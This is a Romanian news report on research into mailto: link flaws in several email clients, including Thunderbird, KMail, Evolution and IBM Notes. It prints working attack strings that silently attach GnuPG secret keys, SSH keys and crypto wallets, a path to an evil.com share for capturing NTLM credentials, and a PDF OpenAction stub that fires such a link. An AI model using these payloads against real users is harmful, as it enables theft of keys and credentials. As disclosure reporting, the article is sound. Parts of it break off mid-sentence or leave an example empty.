Cercetători de la Universitatea Ruhr Bochum (Germania)
Link-uri «
Clienții de corespondență Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) și Pegasus Mail au fost vulnerabili la un atac banal care vă permite să atașați automat orice fișier local, specificat printr-un link precum „mailto:?attach=path_to_file”. Fișierul este atașat fără afișarea unui avertisment, așa că, fără o atenție specială, este posibil ca utilizatorul să nu observe că scrisoarea va fi trimisă cu atașament.
De exemplu, folosind un link precum „mailto:[e-mail protejat]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puteți introduce chei private din GnuPG în scrisoare. De asemenea, puteți trimite conținutul portofelelor cripto (~/.bitcoin/wallet.dat), cheilor SSH (~/.ssh/id_rsa) și orice fișiere accesibile utilizatorului. În plus, Thunderbird vă permite să atașați grupuri de fișiere prin mască folosind constructe precum „attach=/tmp/*.txt”.
Pe lângă fișierele locale, unii clienți de e-mail procesează link-uri către stocarea în rețea și căile pe serverul IMAP. În special, IBM Notes vă permite să transferați un fișier dintr-un director de rețea atunci când procesați legături precum „attach=\\evil.com\dummyfile”, precum și să interceptați parametrii de autentificare NTLM prin trimiterea unei legături către un server SMB controlat de atacator (cererea va fi trimisă cu utilizatorul actual al parametrilor de autentificare).
Thunderbird procesează cu succes cereri precum „attach=imap:///fetch>UID>/INBOX>1/”, care vă permit să atașați conținut din folderele de pe serverul IMAP. În același timp, mesajele preluate de pe IMAP, criptate prin OpenPGP și S/MIME, sunt decriptate automat de clientul de e-mail înainte de a fi trimise. Dezvoltatorii Thunderbird au fost
Versiunile vechi de Thunderbird au fost, de asemenea, vulnerabile la alte două variante de atac pe PGP și S/MIME propuse de cercetători. În special, Thunderbird, precum și OutLook, PostBox, eM Client, MailMate și R2Mail2, au fost supuse unui atac de înlocuire a cheilor, cauzat de faptul că clientul de mail importă și instalează automat certificate noi transmise în mesajele S/MIME, ceea ce permite atacatorul să organizeze înlocuirea cheilor publice deja stocate de utilizator.
Al doilea atac, la care sunt susceptibile Thunderbird, PostBox și MailMate, manipulează caracteristicile mecanismului de salvare automată a mesajelor nefinalizate și permite, folosind parametrii mailto, să inițieze decriptarea mesajelor criptate sau adăugarea unei semnături digitale pentru mesaje arbitrare, cu transmiterea ulterioară a rezultatului către serverul IMAP al atacatorului. În acest atac, textul cifrat este transmis prin parametrul „corp”, iar eticheta „meta refresh” este folosită pentru a iniția un apel către serverul IMAP al atacatorului. De exemplu: ' '
Pentru a procesa automat link-urile „mailto:” fără interacțiunea utilizatorului, pot fi utilizate documente PDF special concepute - acțiunea OpenAction în PDF vă permite să lansați automat gestionarea mailto atunci când deschideți un document:
%PDF-1.5
1 0 obj
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 obj
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
Sursa: opennet.ru